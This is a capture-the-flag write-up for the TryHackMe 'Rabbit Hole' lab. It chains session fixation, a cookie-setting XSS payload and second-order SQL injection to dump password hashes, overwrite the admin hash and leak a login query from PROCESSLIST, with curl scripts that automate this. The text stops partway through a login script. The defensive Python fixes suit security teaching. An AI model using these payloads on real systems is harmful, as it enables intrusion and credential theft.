# Rabbit Hole

{% embed url="<https://tryhackme.com/r/room/rabbitholeqq>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and find two open ports: port 22 with SSH and port 80 with an `Apache httpd 2.4.59` web server.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FXEo995Mg2DH1kuArhmOV%2Fgrafik.png?alt=media&#x26;token=b2a071bd-8b48-4b3c-9da5-205dd7c63dc6" alt=""><figcaption></figcaption></figure>

Next, we continue with a directory scan on the web server. However, it turns up no directories or pages beyond those we can already reach by hand.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FF6oO8xWvWEZTeznc9Del%2Fgrafik.png?alt=media&#x26;token=84a1b47c-40a7-467d-a2f9-a97b982d9b40" alt=""><figcaption></figcaption></figure>

The index page welcomes us with a recruitment campaign. We can either log in or register beforehand and then log in. Furthermore, it is pointed out that an anti-bruteforce measure is active and activities are monitored.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJ5Spb8v3b7VH6LmwPl0i%2Fgrafik.png?alt=media&#x26;token=3808a68d-ef8c-47e0-812c-5bedcaa58fc9" alt=""><figcaption></figcaption></figure>

On the registration page, we find the same note. We first create a new user and log in.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fe5mHpEFMCuSFJi8kthv9%2Fgrafik.png?alt=media&#x26;token=cb1651ed-61af-46d7-bbbe-d26691102bed" alt=""><figcaption></figcaption></figure>

On the login page, on the other hand, the notice is slightly modified and reveals that the anti-bruteforce measure is implemented using database queries. The login takes some time, so the measure might be just a randomized `sleep`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FPuiDgvvvilQWjCkMKcez%2Fgrafik.png?alt=media&#x26;token=bf274d29-3a9f-46b2-aec2-5275bd51acda" alt=""><figcaption></figcaption></figure>

## Session Fixation

After logging in and out again, we notice that the session cookie remains the same. Furthermore, we can choose the cookie value ourselves. For example, after logging in with `0xb0b` as the cookie value, this becomes the valid session ID.

This is a vulnerability where we could force a target to use a specific session ID, allowing us to hijack the target's session once they log in. It occurs when the application does not create a new session ID upon login, leaving the initial session ID valid. It also means we can control several sessions at once.

We'll keep this in mind for now and continue.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FVrsXCHNDRAC5kl6BXofB%2Fgrafik.png?alt=media&#x26;token=052f503f-a146-4798-9d40-235a0a39c1ad" alt=""><figcaption></figcaption></figure>
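To make the defect concrete, here is an added example in Python (not code from the room or from the original post): an in-memory session store that behaves like what we just observed, next to a hardened one that only honours IDs it issued itself and rotates the ID on login. The class and function names are my own; the planted cookie value `0xb0b` is the one used above.

```python
import secrets


class VulnerableSessionStore:
    """Mirrors the observed behaviour: whatever value the client sends as the
    cookie becomes the session key, and that key survives login and logout."""

    def __init__(self):
        self.sessions = {}

    def login(self, client_sid, username):
        self.sessions[client_sid] = {"user": username}
        return client_sid                        # same ID before and after authentication

    def logout(self, client_sid):
        self.sessions[client_sid] = {"user": None}   # ID stays valid, no new one issued

    def user_for(self, sid):
        return self.sessions.get(sid, {}).get("user")


class HardenedSessionStore:
    """Server-issued IDs only (strict mode) and a fresh ID on every privilege change."""

    def __init__(self):
        self.sessions = {}

    def _issue(self):
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self.sessions[sid] = {"user": None}
        return sid

    def resolve(self, client_sid):
        """A cookie value we never issued does not become a session; we issue a new one."""
        if client_sid in self.sessions:
            return client_sid
        return self._issue()

    def login(self, client_sid, username):
        old = self.resolve(client_sid)
        del self.sessions[old]                   # the pre-authentication ID is dead from here on
        new = self._issue()
        self.sessions[new]["user"] = username
        return new

    def logout(self, client_sid):
        self.sessions.pop(client_sid, None)      # destroy the session, do not just blank it

    def user_for(self, sid):
        return self.sessions.get(sid, {}).get("user")


def fixation_attempt(store, planted_sid="0xb0b"):
    """Constructed scenario: an attacker plants planted_sid in the victim's browser,
    then the victim logs in. Returns (does the planted ID now grant the victim's
    session?, the ID the victim actually ends up with)."""
    victim_sid = store.login(planted_sid, "victim")
    return store.user_for(planted_sid) == "victim", victim_sid


if __name__ == "__main__":
    print("vulnerable store hijacked:", fixation_attempt(VulnerableSessionStore())[0])
    print("hardened store hijacked:  ", fixation_attempt(HardenedSessionStore())[0])
```

In PHP terms the hardened store corresponds to `session.use_strict_mode = 1` (reject uninitialised IDs sent by the client) plus `session_regenerate_id(true)` immediately after a successful login and `session_destroy()` on logout.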

## XSS

Furthermore, we notice that our username is reflected.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FdF1q11Dm3ersTLgDtxIR%2Fgrafik.png?alt=media&#x26;token=499937f3-9932-4ab7-b39c-d1db3ef7aa92" alt=""><figcaption></figcaption></figure>

We now use an XSS payload as the username and see how it is evaluated.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FI4PW6rGkcXFvY7BJ8cWf%2Fgrafik.png?alt=media&#x26;token=5c00d34e-a905-488b-84a4-71a5092a52de" alt=""><figcaption></figcaption></figure>

After we have logged in with the user, we see our alert. It works.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FS6c4N5L3juEv7uHu9ja0%2Fgrafik.png?alt=media&#x26;token=cb0d293b-7a10-4c1e-adef-656d2046b5b0" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
At the time, a lot of cookie stealing via XSS was attempted. But despite the fact that you could see logins from the admin (in the timestamp list), no payload was triggered. And this is where serendipity came into play when trying out ChatGPT payloads.
{% endhint %}

We create a user with the following payload and find the following error after logging in.

```javascript
<script>
document.cookie = "PHPSESSID=a; path=/";
location.reload(); // Optional: reload so the fixed session ID is used in the current session.
</script>
```

We might have SQL injection (second order) via the username. In a second-order SQL injection, the injected SQL is first stored in the database and only executes later, when the application processes the stored data in another operation. The payload contains the characters `/` and `"`, which is why the SQL payloads below all start with `/"`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FLGW9NkNBZVcwc6CbvgsY%2Fgrafik.png?alt=media&#x26;token=4ee6799f-eec3-409c-824e-5e614e9f1608" alt=""><figcaption></figcaption></figure>

## SQL injection (second order)

Below you will always find the payload (i.e. username) and the corresponding response as a screenshot. First, a user must always be registered with the payload as the name and then logged in.
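The following is an added example, not code from the room or the original post, that reproduces the second-order pattern in Python with an in-memory SQLite database: registration stores the username with a parameterised `INSERT` (so nothing looks wrong at that point), and a later operation reads the stored username back and concatenates it into a second query, which is where the two-column `UNION SELECT` fires. The schema mirrors the `users` and `logins` tables found later on this page; the admin hash is a constructed sample, and the payload starts with `'` instead of the page's `/"` because this demo quotes strings with single quotes.

```python
import sqlite3

# Constructed schema mirroring the two tables enumerated on this page.
# "group" is renamed grp because it is a reserved word.
SCHEMA = """
CREATE TABLE users  (id INTEGER PRIMARY KEY, username TEXT, password TEXT, grp TEXT);
CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, ts TEXT);
"""
# Constructed sample value (md5 of "password"), standing in for the real admin hash.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"

# Second-order payload: two columns to match the second query, comment eats the closing quote.
PAYLOAD = "' UNION SELECT 1, password FROM users WHERE username='admin' -- "


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute("INSERT INTO users VALUES (1, 'admin', ?, 'admin')", (ADMIN_HASH,))
    con.commit()
    return con


def register(con, username, password):
    """First operation: parameterised, so the payload is stored verbatim without error."""
    cur = con.execute(
        "INSERT INTO users (username, password, grp) VALUES (?, ?, 'user')",
        (username, password),
    )
    con.commit()
    return cur.lastrowid


def record_login(con, username, ts):
    con.execute("INSERT INTO logins (username, ts) VALUES (?, ?)", (username, ts))
    con.commit()


def login_history_vulnerable(con, user_id):
    """Second operation: the stored username is trusted because it 'came from our
    own database' and is concatenated into SQL. This is the defect."""
    (username,) = con.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "SELECT id, ts FROM logins WHERE username = '%s'" % username
    return con.execute(sql).fetchall()


def login_history_safe(con, user_id):
    """Same lookup with a bound parameter: stored data stays data, never SQL."""
    (username,) = con.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    return con.execute("SELECT id, ts FROM logins WHERE username = ?", (username,)).fetchall()


def demo():
    """Registers the payload user, records one login for it and returns
    (rows from the vulnerable history query, rows from the safe one)."""
    con = fresh_db()
    uid = register(con, PAYLOAD, "asdf")
    record_login(con, PAYLOAD, "2024-01-01 00:00:00")
    return login_history_vulnerable(con, uid), login_history_safe(con, uid)


if __name__ == "__main__":
    leaked, legit = demo()
    print("vulnerable:", leaked)   # the admin hash, not a login record
    print("safe:      ", legit)    # the user's own login record
```

The fix is the same as for first-order injection: bind every value, including values read back from your own tables, and keep the output columns the application renders to the ones it expects.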

### Database enumeration

First of all, we check how many columns the injected query has to return. We can guess two from the displayed table with user id and timestamp, but we verify anyway.

```sql
/" UNION SELECT 1 -- -
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FYoF0tNJPI9Epq91QYntr%2Fgrafik.png?alt=media&#x26;token=d95f5c37-0cb3-4872-977d-61c94e7a913c" alt=""><figcaption></figcaption></figure>

```sql
/" UNION SELECT 1,2 -- -
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FOvtjNqMi7xmyefhYffDA%2Fgrafik.png?alt=media&#x26;token=4c4e7f09-a84d-4831-b4c9-6295fa4191b7" alt=""><figcaption></figcaption></figure>

So we have two columns. We now enumerate the database using union-based SQL injection with the help of the `INFORMATION_SCHEMA` database. The tables `users` and `logins` are present in the current database.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1, table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=DATABASE() -- 
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FxHqzBC9qvFt0Dm3EAaEN%2Fgrafik.png?alt=media&#x26;token=575f6da6-a915-44f8-9c4d-be5a2851f06e" alt=""><figcaption></figcaption></figure>

Next, we try to dump the users table. However, we realize that the output is limited to 16 characters.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'-- -
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FOqWRLHE233SAtAS934af%2Fgrafik.png?alt=media&#x26;token=54b2f5c6-9379-4a3d-928f-e3a82d7bf20c" alt=""><figcaption></figcaption></figure>

We use `SUBSTRING` to retrieve the output in 16-character blocks, step by step.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 1, 16)-- -
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FhIhKKjcvxmkrO7JRBWq1%2Fgrafik.png?alt=media&#x26;token=7fd9d582-83bc-4133-9e85-ca66e2313a27" alt=""><figcaption></figcaption></figure>

With the second user, we retrieve the next 16 characters.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 17, 16)-- -
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fi0xhEYnT7c6FDxClJA6Z%2Fgrafik.png?alt=media&#x26;token=72bb074d-ff79-4373-a94a-0351843bf184" alt=""><figcaption></figcaption></figure>

So the `users` table consists of `id,username,password,group`.

### Password Dump

Now we want to dump the admin password. It seems to be an MD5 hash. Using hashcat, we are unable to crack it with `rockyou.txt`. We could also try something like <https://hashes.com/en/decrypt/hash>, but it is not cracked there either.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 1, 16) -- -
```

{% endcode %}

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 17, 16) -- -
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJgIwDlL8JZTgvq85O7nM%2Fgrafik.png?alt=media&#x26;token=6bde3603-b5d4-437d-83ba-635442d6273e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fv3T19RPrr5gHWBK8nXtJ%2Fgrafik.png?alt=media&#x26;token=e04adaa7-d9e8-48e6-ba9d-e9bd4bb2f924" alt=""><figcaption></figcaption></figure>

### User Enumeration

Besides `admin`, there are other users present, `foo` and `bar`.

```sql
/" UNION SELECT 1,`username` FROM users -- -
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FTkQg033TrKBSVoIW4mHx%2Fgrafik.png?alt=media&#x26;token=cad068e8-81d2-4f30-81e4-d272dcb1bafa" alt=""><figcaption></figcaption></figure>

We repeat the steps from before for the users `foo` and `bar` to dump their password hashes. The following is only the payload for user `foo`.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='foo'), 1, 16) -- -
```

{% endcode %}

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='foo'), 17, 16) -- -
```

{% endcode %}

We are able to crack both hashes, which confirms we are dealing with MD5. But the cracked values themselves tell us it's a rabbit hole.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FKdy5rAChqZsbjSyY8mb0%2Fgrafik.png?alt=media&#x26;token=5df49f9c-30d5-4cf2-ae97-bf95d6a3665c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJjAwRMZAo95EYZCrdQAl%2Fgrafik.png?alt=media&#x26;token=98b04e82-4031-4fa7-b844-9cf9fa05000a" alt=""><figcaption></figcaption></figure>

Another idea is to set the `group` of a user to `admin`, or to change the password hash of the `admin` user to one we choose. But after logging in as `admin` with our own hash, the index page stays the same and does not reveal anything new to us.

{% code overflow="wrap" %}

```sql
\" UNION SELECT 1,2; UPDATE users SET password = 'edfc58e50c421e52d25527a737c249da' WHERE username = 'admin';
```

{% endcode %}

### Processlist

We can still see that the `admin` is logging in every minute. So the login query is also being executed, and is possibly logged.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FB7Hx41s9ZUkWqs7Em4G8%2Fgrafik.png?alt=media&#x26;token=79edd45f-7cd8-4b03-a962-599d6c607fd9" alt=""><figcaption></figcaption></figure>

With a bit of research, we find that `INFORMATION_SCHEMA` has the table `PROCESSLIST`. The [Information Schema](https://mariadb.com/kb/en/information_schema/) `PROCESSLIST` table contains information about running threads.

{% embed url="<https://mariadb.com/kb/en/information-schema-processlist-table/>" %}

The column `INFO` might hold the treasure we are seeking, since it contains the statement the thread is currently executing. With our assumption from earlier that the anti-bruteforce measure is just a `sleep`, we might have a chance to leak the login query, because statements stay listed in `PROCESSLIST` while they execute.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F2dsN2UyUkrNFMvcyT5iW%2Fgrafik.png?alt=media&#x26;token=ec917bd8-389a-4adb-80ef-a787c4b0739d" alt=""><figcaption></figcaption></figure>
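The root cause here is a login statement that carries the submitted credentials and sleeps inside the database, so it sits in `PROCESSLIST` for anyone who can run a query. As an added example (not from the room or the original post), here is the login flow written the other way round in Python with SQLite: the only statement sent to the database is a parameterised lookup by username, the hash comparison happens in application code, and the anti-bruteforce delay is applied there too. Function names, the PBKDF2 round count and the delay length are my own choices.

```python
import hashlib
import hmac
import secrets
import sqlite3
import time

PBKDF2_ROUNDS = 50_000        # constructed demo setting; tune for your hardware
FAILURE_DELAY_SECONDS = 1.0   # the throttle, applied in the app, never inside SQL


def user_db():
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
        "salt BLOB NOT NULL, pw_hash BLOB NOT NULL)"
    )
    return con


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Computed once so that an unknown username costs the same work as a wrong password.
_DUMMY_SALT = bytes(16)
_DUMMY_HASH = hash_password("", _DUMMY_SALT)


def add_user(con, username, password):
    salt = secrets.token_bytes(16)
    con.execute(
        "INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
        (username, salt, hash_password(password, salt)),
    )
    con.commit()


def login(con, username, password, delay=time.sleep):
    """Returns True on success. The password never reaches the database and the
    delay never runs inside a query, so PROCESSLIST has nothing worth reading."""
    row = con.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    salt, stored = row if row is not None else (_DUMMY_SALT, _DUMMY_HASH)
    # Constant-time compare; the "row is not None" guard stops the dummy from matching.
    ok = hmac.compare_digest(hash_password(password, salt), stored) and row is not None
    if not ok:
        delay(FAILURE_DELAY_SECONDS)   # throttle failed attempts in application code only
    return ok


if __name__ == "__main__":
    con = user_db()
    add_user(con, "alice", "correct horse")
    print(login(con, "alice", "correct horse"))   # True, no delay
    print(login(con, "alice", "wrong"))           # False after the delay
```

Two further controls follow from the same finding: the web application's database account should not hold the `PROCESS` privilege, so that `information_schema.PROCESSLIST` only ever shows its own threads, and password hashes should be salted and slow (PBKDF2 above, or bcrypt/argon2) rather than unsalted MD5 as found in the `users` table.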

We query for the `COMMAND` column and see that the current process is running a query.

```sql
/" UNION SELECT 1,COMMAND FROM information_schema.PROCESSLIST -- -
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FkSQUo4M4euvNlz90FOuz%2Fgrafik.png?alt=media&#x26;token=cc3ed58c-39c9-4dfd-9737-195cd6eb16d1" alt=""><figcaption></figcaption></figure>

Next, we try to dump the `INFO` column, and see part of a query. Nice.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(INFO) FROM information_schema.PROCESSLIST), 1, 16) -- -
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FrikpsfQLrrxtBMHMJqPy%2Fgrafik.png?alt=media&#x26;token=e372e18a-f7cd-4f68-92b5-872e07b9c10a" alt=""><figcaption></figcaption></figure>

By reloading the page several times, we can see, with a bit of luck, a different query:

```
SELECT * from us
```

This might be the `admin` logging in.

Furthermore, we can observe that several queries are running simultaneously while we are logging in. Once a query has finished executing, however, it is no longer listed in the table.

{% code overflow="wrap" %}

```sql
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(ID) FROM information_schema.PROCESSLIST), 1, 16) -- -
```

{% endcode %}

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FfpttX3ns0HIdzMdXh7m2%2Fgrafik.png?alt=media&#x26;token=eea9ecbd-1d8b-49e7-995f-76d41c1690b4" alt=""><figcaption></figcaption></figure>

By dumping the table, we always create new queries ourselves. However, only the oldest one is of interest, i.e., the one with which the `admin` logs in. Therefore, we now query for the smallest ID. With a bit of timing, we are able to see the different response already mentioned.

{% code overflow="wrap" %}

```sql
\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- -
```

{% endcode %}

We do this in the same way as with the password dump, with a separate user for each 16-character block, which means we have to create a number of users.

Furthermore, the information has to be retrieved quickly, before the query vanishes. Fortunately, we have session fixation and can assign a session to each registered user on login. But more on that in a moment; first we register the users.

We can do this laboriously in Burp Suite, as shown below. This is just an example, in which the password is set to the same value as the username. The following scripts use a much simpler password for readability.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FcqGApW7MMQBZuXq5Ynm5%2Fgrafik.png?alt=media&#x26;token=3212b1cd-0df2-4f10-9533-2d5caaa78630" alt=""><figcaption></figcaption></figure>

Alternatively, we could use Burp Suite to generate the curl request and then adapt the `SUBSTRING` offset to create different users, each targeting a different block:

{% code title="register.sh" overflow="wrap" lineNumbers="true" %}

```bash
#!/bin/bash
# One registration per 16-character block of the PROCESSLIST INFO column.
# Offsets 1,17,...,209 are the SUBSTRING offsets used above (14 users).
# Content-Length is left to curl: the hard-coded value from the Burp export
# did not match the body length once the offset grew to two or three digits.
# Accept-Encoding is dropped so that -i prints a readable, uncompressed body.
target='http://rabbithole.thm'

for offset in $(seq 1 16 209); do
    curl -i -s -k -X 'POST' \
        -H 'Host: rabbithole.thm' \
        -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' \
        -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
        -H 'Accept-Language: en-US,en;q=0.5' \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -H "Origin: $target" \
        -H 'Connection: close' \
        -H "Referer: $target/register.php" \
        -H 'Upgrade-Insecure-Requests: 1' \
        -b 'PHPSESSID=1' \
        --data-binary "username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), ${offset}, 16) -- -&password=asdf&submit=Submit+Query" \
        "$target/register.php"
done
```

{% endcode %}

Next, we run the register script to register the users.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FIcRylsUKwPKLqefNox2P%2Fgrafik.png?alt=media&#x26;token=c2cdd8bc-6d2b-45c1-90ea-97d9c4c23b35" alt=""><figcaption></figcaption></figure>

Now we need to log in with the users. We could use Burp Suite again, where we need to edit the `PHPSESSID` value and the `SUBSTRING` offset. Each user needs a different session ID.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fu1RpxW9K9TXq9UtlWjHB%2Fgrafik.png?alt=media&#x26;token=28e13c53-e340-4dd9-80a3-ff7784a72e69" alt=""><figcaption></figcaption></figure>

This could also be done using the following script:

{% code title="login.sh" overflow="wrap" lineNumbers="true" %}

```bash
#!/bin/bash
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 197' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=1' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 1, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'  
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=2' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 17, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'  
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=3' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 33, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=4' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 49, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'
curl -i -s -k -X $'POST' \
    -H $'Host: rabbithole.thm' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 198' -H $'Origin: http://rabbithole.thm' -H $'Connection: close' -H $'Referer: http://rabbithole.thm/login.php' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=5' \
    --data-binary $'username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), 65, 16) -- -&password=asdf&login=Submit+Query' \
    $'http://rabbithole.thm/login.php'    
